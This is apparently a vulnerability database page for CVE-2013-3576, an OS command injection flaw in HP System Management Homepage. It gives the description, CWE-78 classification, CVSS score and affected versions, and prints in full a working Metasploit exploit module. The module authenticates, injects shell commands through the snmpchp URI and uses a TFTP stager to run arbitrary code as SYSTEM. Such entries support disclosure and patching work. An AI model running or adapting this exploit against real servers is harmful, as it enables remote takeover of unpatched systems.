CVE-2013-3576 Detail

CVE-2013-3576

CVE Descriptions

ginkgosnmp.inc in HP System Management Homepage (SMH) allows remote authenticated users to execute arbitrary commands via shell metacharacters in the PATH_INFO to smhutil/snmpchp.php.en.

CVE Informations

Related Weaknesses

CWE-ID	Weakness Name	Source
CWE-78	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

Metrics

Metrics	Score	Severity	CVSS Vector	Source
V2	9		AV:N/AC:L/Au:S/C:C/I:C/A:C	nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

EPSS First.org

Exploit information

Exploit Database EDB-ID : 26420

Publication date : 2013-06-23 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStagerTFTP include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "HP System Management Homepage JustGetSNMPQueue Command Injection", 'Description' => %q{ This module exploits a vulnerability found in HP System Management Homepage. By supplying a specially crafted HTTP request, it is possible to control the 'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc), which will be used in a exec() function. This results in arbitrary code execution under the context of SYSTEM. Please note: In order for the exploit to work, the victim must enable the 'tftp' command, which is the case by default for systems such as Windows XP, 2003, etc. }, 'License' => MSF_LICENSE, 'Author' => [ 'Markus Wulftange', 'sinn3r' #Metasploit ], 'References' => [ ['CVE', '2013-3576'], ['OSVDB', '94191'], ['US-CERT-VU', '735364'] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'SSL' => true }, 'Platform' => 'win', 'Targets' => [ ['Windows', {}], ], 'Privileged' => false, 'DisclosureDate' => "Jun 11 2013", 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(2381), # USERNAME/PASS may not be necessary, because the anonymous access is possible OptString.new("USERNAME", [false, 'The username to authenticate as']), OptString.new("PASSWORD", [false, 'The password to authenticate with']) ], self.class) end def peer "#{rhost}:#{rport}" end def check cookie = '' if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty? cookie = login if cookie.empty? print_error("#{peer} - Login failed") return Exploit::CheckCode::Safe else print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") end end sig = Rex::Text.rand_text_alpha(10) cmd = Rex::Text.uri_encode("echo #{sig}") uri = normalize_uri("smhutil", "snmpchp/") + "&&#{cmd}&&echo" req_opts = {} req_opts['uri'] = uri if not cookie.empty? browser_chk = 'HPSMH-browser-check=done for this session' curl_loc = "curlocation-#{datastore['USERNAME']}=" req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}" end res = send_request_raw(req_opts) if not res print_error("#{peer} - Connection timed out") return Exploit::CheckCode::Unknown end if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/ return Exploit::CheckCode::Vulnerable end Exploit::CheckCode::Safe end def login username = datastore['USERNAME'] password = datastore['PASSWORD'] cookie = '' res = send_request_cgi({ 'method' => 'POST', 'uri' => '/proxy/ssllogin', 'vars_post' => { 'redirecturl' => '', 'redirectquerystring' => '', 'user' => username, 'password' => password } }) if not res fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login") end # CpqElm-Login: success if res.headers['CpqElm-Login'].to_s =~ /success/ cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || '' end cookie end def setup_stager execute_cmdstager({ :temp => '.'}) end def execute_command(cmd, opts={}) # Payload will be: C:\hp\hpsmh\data\htdocs\smhutil uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo") req_opts = {} req_opts['uri'] = uri if not @cookie.empty? browser_chk = 'HPSMH-browser-check=done for this session' curl_loc = "curlocation-#{datastore['USERNAME']}=" req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}" end print_status("#{peer} - Executing: #{cmd}") res = send_request_raw(req_opts) end def exploit @cookie = '' if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty? @cookie = login if @cookie.empty? fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed") else print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'") end end @uri = normalize_uri('smhutil', 'snmpchp/') + "&&" setup_stager end end

Products Mentioned

Configuraton 0

Hp>>System_management_homepage >> Version *

Hp>>System_management_homepage >> Version - (Open CPE detail)
Hp>>System_management_homepage >> Version 2.0.0 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.0.1 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.0.1.104 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.0.2 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.0.2.106 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.0-103 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.0-103\(a\) (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.0-109 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.0-118 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.0.121 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.1 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.2 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.2-127 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.2.127 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.3 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.3.132 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.4 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.4-143 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.4.143 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.5 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.5-146 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.5.146 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.5.146 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.6 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.6-156 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.6.156 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.7 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.7-168 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.7.168 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.8 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.8-177 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.8.179 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.9 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.9-178 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.10 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.10-186 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.10.186 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.10.186 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.10.186 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.11 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.11-197 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.11.197 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.12-118 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.12-200 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.12.201 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.14 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.14.20 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.15 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.15-210 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.1.15.210 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.2.6 (Open CPE detail)
Hp>>System_management_homepage >> Version 2.2.8 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.0.0 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.0.0-68 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.0.0.64 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.0.1 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.0.1-73 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.0.1.73 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.0.2 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.0.2-77 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.0.2.77 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.0.2.77 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.2.2 (Open CPE detail)
Hp>>System_management_homepage >> Version 3.2.7 (Open CPE detail)
Hp>>System_management_homepage >> Version 6.0 (Open CPE detail)
Hp>>System_management_homepage >> Version 6.0.0-95 (Open CPE detail)
Hp>>System_management_homepage >> Version 6.0.0.96 (Open CPE detail)
Hp>>System_management_homepage >> Version 6.1 (Open CPE detail)
Hp>>System_management_homepage >> Version 6.1.0-103 (Open CPE detail)
Hp>>System_management_homepage >> Version 6.1.0.102 (Open CPE detail)
Hp>>System_management_homepage >> Version 6.2.0 (Open CPE detail)
Hp>>System_management_homepage >> Version 6.2.2.7 (Open CPE detail)
Hp>>System_management_homepage >> Version 6.3.0 (Open CPE detail)
Hp>>System_management_homepage >> Version 6.3.1 (Open CPE detail)
Hp>>System_management_homepage >> Version 7.0 (Open CPE detail)
Hp>>System_management_homepage >> Version 7.1 (Open CPE detail)
Hp>>System_management_homepage >> Version 7.2 (Open CPE detail)
Hp>>System_management_homepage >> Version 7.2.1 (Open CPE detail)
Hp>>System_management_homepage >> Version 7.4.0 (Open CPE detail)
Hp>>System_management_homepage >> Version 7.5.3.1 (Open CPE detail)
Hp>>System_management_homepage >> Version 7.5.4.3 (Open CPE detail)
Hp>>System_management_homepage >> Version 7.5.5.0 (Open CPE detail)
Hp>>System_management_homepage >> Version 7.5.5.6 (Open CPE detail)
Hp>>System_management_homepage >> Version 7.6 (Open CPE detail)
Hp>>System_management_homepage >> Version 7.6.1 (Open CPE detail)

References

http://marc.info/?l=bugtraq&m=137952496405683&w=2
Tags : vendor-advisory, x_refsource_HP

http://www.kb.cert.org/vuls/id/735364
Tags : third-party-advisory, x_refsource_CERT-VN

CVE-2013-3576 : Detail